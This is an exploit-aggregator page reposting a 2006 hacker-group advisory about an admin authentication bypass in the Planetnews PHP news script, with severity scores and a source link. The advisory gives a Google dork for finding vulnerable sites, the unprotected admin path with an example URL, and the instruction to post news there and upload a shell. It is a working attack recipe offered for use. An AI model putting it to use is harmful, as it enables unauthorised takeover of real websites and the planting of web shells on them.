Advertisement






Planetnews Authecnication Admin ByPass

CVE Category Price Severity
Not specified CWE-287 $500 Critical
Author Risk Exploitation Type Date
Unknown High Remote 2006-07-25
CVSS EPSS EPSSP
CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006070073

Below is a copy:

SOFTWARE:

===========

again Planetc :)

Planetnews

http://www.planetc.de

DESCRIPTION:

============

google dork = planetnews filetype:php

last path add to "admin/planetnews.php" edit or add to news, and upload your shell

example;

http://www.site.com/news/admin/planetnews.php

#################################################

Credits:AlpEren and tugr@

http://www.ayyildiz.org

http://www.ayyildiz-team.org

Special thanx to metlak,thehacker,shadow,spyMETA,FermaN,ATAKAN,GençTürk and All AYYILDIZ member.

Damn with PKK, damn with terrorism.

greets to lamer CWDoktoray :)

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum